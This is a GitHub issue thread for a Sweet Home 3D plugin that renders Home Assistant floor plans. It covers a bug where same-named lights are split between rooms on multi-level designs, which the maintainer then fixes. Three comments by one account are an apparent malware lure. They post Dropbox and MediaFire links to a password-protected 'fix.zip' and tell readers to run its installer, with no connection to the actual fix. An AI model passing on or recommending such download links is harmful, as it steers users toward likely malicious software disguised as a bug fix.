### ISSUE TITLE
Can't have multiple lights with same name in the same room

### ISSUE THREAD

**Issue by jrlambs** [shmuelzon/home-assistant-floor-plan#69]
**Describe the bug**
I'm not sure this is a bug with the plugin, but rather an issue with the way sweet home 3d works that prevents the plugin for working as intended.  It appears that when I name multiple lights sources with the same name and place them in the same name, then tell the plugin I want to render in "Room Overlay" mode each of the light sources show in different rooms.  some of them with clearly computer-generated names.  The only way I can get multiple light sources to show up in the same room is if I give them different names, but then that messes up the plug-in because it expects lights that are controlled together to all have the same name.
**To Reproduce**
1. Create a home in sweet home with more than one room
2. place multiple light sources in one of the rooms all having the same name.
3. create a new level above your current level.
4. place multiple light sources in the room above it.
3. open plugin
5. see that each light source with the same name is placed in a different "room"

**Expected behavior**
Each light source shows up in the same room so that it works with Room Overlay renders

**Additional context**
I'm not sure the best way to fix this.  I've tried on windows version 7.5 and OSX version 7.4.1 and noticed the same behavior.  I think it should probably be that all lights controlled by the same switch should be in a light group, named using the home assistant switch name.  Then if multiple lights (or groups) exist in the same room then it knows to render with the different lights on/off possibilities.

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by shmuelzon** [comment]
What you're describing is a bit odd since it's exactly how I started with, before moving to the CSS-based rendering scheme.

Any chance you can share your SH3D project file, assuming there's nothing too private there? I'll compare with my own and see what's up.

**Comment by jrlambs** [comment]
Ah ok, I think I've now re-created it with a brand new home layout.  I've attached the file.

The key here is having multiple levels in your design.  If you create a home with 2 levels and rooms on top of each other on each level then the lights with the same name get split between the room above and the room below. 
[TestHomeWithIssue.sh3d.zip](https://github.com/user-attachments/files/16754110/TestHomeWithIssue.sh3d.zip)

**Comment by shmuelzon** [comment]
I changed the plugin in such a way that if the 3D view is configured to show only a specific level, only the lights, rooms and entities of that level are considered. If all levels are displayed then everything is used (and still the lights will be associated to the correct room, as above.

I created a pull request for this but would be grateful if you could try this out on your project before I merge it.
The [PR build](https://github.com/shmuelzon/home-assistant-floor-plan/actions/runs/10629743723/job/29467222810?pr=71) can be found at: https://github.com/shmuelzon/home-assistant-floor-plan/actions/runs/10629743723/artifacts/1873796189

**Comment by jrlambs** [comment]
Hi @shmuelzon I can confirm that this does indeed fix the issue I was seeing.  I've found a couple of other scenarios that seem to break it if you're interested but they're probably a bit less common.

honestly.. thanks so much for being on top of this.  This tool is excellent and has made it so I can actually re-render my floor plan from time to time when things change.  

Here are the other scenarios I've found.. but honestly.. I'm not too worried about them.

1) My garage is a couple steps down from my first floor.  in order to make this in SH3d I had to put it as another level that has another elevation.  but when I click on "1st Floor" to do my render the garage still shows up because it's only a foot or two lower.  Anyway, the lights in the garage obviously don't show up when I do a render of the first floor.
2) I put lights on the outside of my hours (lights outside doors and in front of my garage.). these technically aren't in a room, and so therefore aren't included in the render.

**Comment by jrlambs** [comment]
if you have a way I can send it to you without attaching publicly here, I'll send you my actual home file where you can see/play with some of these.

**Comment by shmuelzon** [comment]
Hey,

For the outside lamps, I agree that the plugin would be more feature-complete if in the room-overlay mode it would detect lights that aren't in any room and, maybe, combine them as a "other" room or something like that. Until that happens, I can think of two workarounds. The first is to create a room of the outside, something like this (from your sample project):
![image](https://github.com/user-attachments/assets/0ea36398-086e-499d-aaf7-d05fccd08277)
It just wraps around the house and I configured it to not display the floor.
The second option is to use the CSS overlay option which I think provides better results than the room-overlay. Out of curiosity, why do you prefer the room-overlay mode?

As for the garage, the only way I can think about handling this is to let the user select which level(s) to include in a multi-level design as I wouldn't be able to guess if bottom floors should be included or not and it would be wasteful to always render lower levels if, in most cases, they wouldn't be visible anyway.

If you still want me to take a look at your design, you can email it to me. Same user name as here at gmail.

**Comment by jrlambs** [comment]
Honestly, nothing is wrong with the CSS version.  The documentation said these other versions produced "Better Results" and I wanted to see how much better it was.  I'll send you my layout just in case you feel like using it for testing... but I'm in no rush/need to have all of this resolved.  I'm a programmer so I know good test data is sometimes hard to find and just wanted to give you the scenarios I've found just in case.
